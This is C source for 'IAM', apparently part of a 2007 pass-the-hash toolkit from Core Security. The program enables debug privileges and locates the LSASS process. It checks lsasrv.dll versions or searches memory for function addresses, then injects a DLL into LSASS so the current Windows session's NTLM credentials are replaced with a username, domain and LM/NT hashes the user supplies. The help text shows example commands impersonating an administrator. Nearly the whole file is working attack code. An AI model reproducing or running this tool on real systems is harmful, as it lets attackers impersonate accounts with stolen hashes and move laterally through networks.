// $Id: iam.c,v 1.1 2007/09/03 21:27:05 hochoa Exp $

/*
 * iam.c
 *
 * Description: 
 *
 * Author: Hernan Ochoa (hochoa@coresecurity.com)
 *
 * Copyright (c) 2007 CORE SDI S.A., Buenos Aires, Argentina.
 * All rights reserved.
 *
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES
 * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY
DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES
 * RESULTING FROM THE USE OR MISUSE OF ANY RECOMPILATION OF THIS SOURCE
 * CODE NOT PROVIDED BY CORE SDI S.A.
 **/

#include <windows.h>
#include <stdio.h>
#include <psapi.h>
#include "dllfuncs.h"
#include "findfuncs.h"

#define LSASRVDLL_WINXPSP2_FILEVERSION_MS		0x50001
#define LSASRVDLL_WINXPSP2_FILEVERSION_LS		0xA280BA0

#define LSASRVDLL_SERVER2003_FILEVERSION_MS		0x50002
#define LSASRVDLL_SERVER2003_FILEVERSION_LS		0xECE0000

#define LSASRVDLL_VISTA_FILEVERSION_MS			0x60000
#define LSASRVDLL_VISTA_FILEVERSION_LS			0x17704002

DWORD GetLogonID(void);
BOOL EnableDebugPrivs(void);
DWORD GetLSASSPid(void);

DWORD GetLSASSPid()
{
	
	DWORD ProcArray[100];
	DWORD nBytes;
	int nTotalProc;
	DWORD dwLSASSPID;
	int nProc;

	EnumProcesses(ProcArray, sizeof(ProcArray), &nBytes);
	nTotalProc = nBytes / sizeof(DWORD);

	for (nProc = 0; nProc < nTotalProc; nProc++)
	{
		CHAR szFileName[MAX_PATH];
		HMODULE ModArray[100];
		HANDLE hProc;

		hProc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
			FALSE, ProcArray[nProc]);
		EnumProcessModules(hProc, ModArray, sizeof(ModArray), &nBytes);
		GetModuleFileNameEx(hProc, ModArray[0], szFileName, sizeof(szFileName));
		CloseHandle(hProc);

		if (strstr(szFileName, "lsass.exe"))
		{
			dwLSASSPID = ProcArray[nProc];
		}
	}
	
	return dwLSASSPID;
}

BOOL EnableDebugPrivs()
{
	HANDLE hToken = 0;
	TOKEN_PRIVILEGES newPrivs;
	BOOL bStatus = FALSE;

	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,
		&hToken))
	{
		goto clean;
    }

	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &newPrivs.Privileges[0].Luid))
    {
		goto clean;
	}

	newPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	newPrivs.PrivilegeCount = 1;
    
	if (!AdjustTokenPrivileges(hToken, FALSE, &newPrivs, 0, NULL, NULL))
	{
		goto clean;
	}

	bStatus = TRUE;

clean:
	if (hToken)
	{
		CloseHandle (hToken);
	}

	return bStatus;	
}

// Return: 0 = error
DWORD GetLogonID(void)
{
	TOKEN_STATISTICS TokenStats;
	HANDLE hToken;
	BOOL bStatus;
	DWORD nBytes;
	DWORD logonIDlow;
	DWORD logonIDhigh;


	logonIDlow = logonIDhigh = 0;
	bStatus = OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);
	if (bStatus)
	{
		bStatus = GetTokenInformation(hToken, TokenStatistics,
			&TokenStats, sizeof(TokenStats), &nBytes);
		if (bStatus)
		{
			logonIDlow = TokenStats.AuthenticationId.LowPart;
			logonIDhigh = TokenStats.AuthenticationId.HighPart;
			bStatus = TRUE;
		}
	}

	
	return logonIDlow;
}

void banner(void)
{

	printf("IAM v1.1 - by Hernan Ochoa (hochoa@coresecurity.com) - (c) 2007 Core Security Technologies\n");

}

void help(void)
{
	printf("This tool changes the current session NTLM credentials.\n");
	printf("syntax:\n");
	printf("\t\tiam.exe username domainname LMhash NThash <-B>\n\n");
	printf("-B\tis an optional parameter. If iam.exe crashes when run in your system, use this parameter. ");
	printf("IAM.EXE will try to locate some memory locations instead of using hard-coded values.\n");
	printf("Examples:\n");
	printf("\t\tiam.exe administrator mydomain 0102030405060708090A0B0C0D0E0F10 0102030405060708090A0B0C0D0E0F10\n");
	printf("or:\n");
	printf("\t\tiam.exe administrator mydomain 0102030405060708090A0B0C0D0E0F10 0102030405060708090A0B0C0D0E0F10 -B\n\n\n");

}


int main(int argc, char *argv[])
{
DWORD dwLogonID, dwLSASSPID;
BOOL bRet;
BYTE LMHash[16], NTHash[16];
char LMHashstring[32], NTHashstring[32];
DWORD dwHandle;
DWORD dwFileInfoSize;
PBYTE pbFileInfoData;
char windowsDirectory[MAX_PATH];
char lsasrvPath[2048];
VS_FIXEDFILEINFO *pFixedFileInfo;
unsigned int uFixedFileInfoSize;
char szUsername[1024], szDomainName[1024];
int f, j, i;
char tmp1[10];
BOOL bFindFuncs;
AddressesGroup currentAddrGroup;


	// Show banner
	banner();

	// do not find functions by default
	bFindFuncs = FALSE;

	// Do we have the required parameters?
	// 5 parameters are required, the sixth is not (-B).
	if( argc < 5 ) {
		help();
		return 0;
	}

	// is the sixth parameter ok?
	if( (argc == 6) && (!strcmp(argv[5], "-B")) ) {
		bFindFuncs = TRUE;
	}
	else if( argc == 6 ) {
		// invalid 6th. parameter
		printf("Invalid parameter: %s\n", argv[5]);
		help();
		return 0;
	}
	


	// There's not much sanity checking, so be gentle :)	
	// copy parameters 
	memset( szUsername, '\0', sizeof(szUsername) );
	memset( szDomainName, '\0', sizeof(szDomainName) );
	strncpy( szUsername, argv[1], sizeof(szUsername)-2 );
	strncpy( szDomainName, argv[2], sizeof(szDomainName)-2 );
	// yes, with a NULL at the end
	memcpy( LMHashstring, argv[3], 32);
	memcpy( NTHashstring, argv[4], 32);

	// convert ascii to hex
	for( f=0, j=0 ; f<32; f+=2, j++) {
              tmp1[0] = LMHashstring[f];
              tmp1[1] = LMHashstring[f+1];
              tmp1[2] = '\0';
              sscanf(tmp1, "%X", &i);
              LMHash[j] = (unsigned char)i;

              tmp1[0] = NTHashstring[f];
              tmp1[1] = NTHashstring[f+1];
              tmp1[2] = '\0';
              sscanf(tmp1, "%X", &i);
              NTHash[j] = (unsigned char)i;


	}
	
	printf("Parameters:\n");
	printf("Username: %s\n", szUsername);
        printf("Domainname: %s\n", szDomainName);
	printf("LM hash: ");
	for(j=0; j<16; j++) {
			printf("%.2X", (unsigned int)LMHash[j]);
	}
	printf("\nNT hash: ");
	for(j=0; j<16; j++) {
			printf("%.2X", (unsigned int)NTHash[j]);
	}
	printf("\n");


	if( GetWindowsDirectory( windowsDirectory, sizeof(windowsDirectory)) == 0) {
			printf("Cannot Obtain Windows Directory!.\n");
			exit(0);
	}

	windowsDirectory[MAX_PATH-1] = '\0';
	lsasrvPath[ sizeof(lsasrvPath)-1 ] = '\0';
	_snprintf(lsasrvPath,sizeof(lsasrvPath)-1,"%s\\system32\\lsasrv.dll", windowsDirectory);
	lsasrvPath[ sizeof(lsasrvPath)-1 ] = '\0';

	printf("LSASRV.DLL Location: %s\n", lsasrvPath);

	dwFileInfoSize = GetFileVersionInfoSize(lsasrvPath,&dwHandle);
	if( dwFileInfoSize == 0 ) {
			printf("Cannot get LSASRV.DLL Version Size Info.\n");
			exit(0);
	}

	pbFileInfoData = NULL;
	pbFileInfoData = (PBYTE) malloc( dwFileInfoSize );
	if( pbFileInfoData == NULL ) {
		printf("Cannot allocate buffer to get LSASRV.DLL Info.\n");
		exit(0);
	}

	bRet = GetFileVersionInfo( lsasrvPath,
				dwHandle,
				dwFileInfoSize,
				pbFileInfoData );

	if( bRet == FALSE ) {
			printf("Cannot get LSASRV.DLL VersionInfo!.\n");
			if( pbFileInfoData != NULL ) free( pbFileInfoData );
			exit(0);
	}


	bRet = VerQueryValue( pbFileInfoData, "\\", &pFixedFileInfo, &uFixedFileInfoSize );
	if( bRet == FALSE || uFixedFileInfoSize == 0 ) {
		printf("Cannot obtain version info from info block!.\n");
		exit(0);
	}

	// display LSASRV.DLL version
	printf("LSASRV.DLL version: %.8Xh.%8Xh\n", pFixedFileInfo->dwFileVersionMS, pFixedFileInfo->dwFileVersionLS);

	// Let's check to see if it is ok to work with this DLL
	printf("Checking LSASRV.DLL....");
	if( bFindFuncs == FALSE ) {
		bRet = FALSE;
		if( pFixedFileInfo->dwFileVersionMS == LSASRVDLL_WINXPSP2_FILEVERSION_MS 
				&& pFixedFileInfo->dwFileVersionLS == LSASRVDLL_WINXPSP2_FILEVERSION_LS ) {
			bRet = TRUE;
		}

		if( pFixedFileInfo->dwFileVersionMS == LSASRVDLL_SERVER2003_FILEVERSION_MS 
				&& pFixedFileInfo->dwFileVersionLS == LSASRVDLL_SERVER2003_FILEVERSION_LS ) {
			bRet = TRUE;
		}

		if( pFixedFileInfo->dwFileVersionMS == LSASRVDLL_VISTA_FILEVERSION_MS 
				&& pFixedFileInfo->dwFileVersionLS == LSASRVDLL_VISTA_FILEVERSION_LS ) {
			bRet = TRUE;
		}

		if( bRet == FALSE ) {
			printf("Unknown LSASRV.DLL.\n");
			exit(0);
		}

		printf("OK!\n");
	}
	else {
		printf("skipped. (-B was specified).\n");
		printf("Trying to obtain addresses...");
		if( findFuncs( &currentAddrGroup ) == FALSE ) {
			printf("Failed! (AC = %.8X, EM = %.8X)\n", currentAddrGroup.pAddCredential, currentAddrGroup.pEncryptMemory);
			exit(0);
		} else {
			printf("Ok! (AC = %.8X, EM = %.8X)\n", currentAddrGroup.pAddCredential, currentAddrGroup.pEncryptMemory);
		}


	}

	EnableDebugPrivs();
	dwLogonID = GetLogonID();
	dwLSASSPID = GetLSASSPid();
	printf("LOGONID: %.8xh\n", dwLogonID );
	printf("LSASS_PID: %.8xh\n", dwLSASSPID );

	bRet = InjectDll(dwLSASSPID, dwLogonID, 0, bFindFuncs, pFixedFileInfo->dwFileVersionMS, pFixedFileInfo->dwFileVersionLS, szUsername, szDomainName, LMHash, NTHash);

}

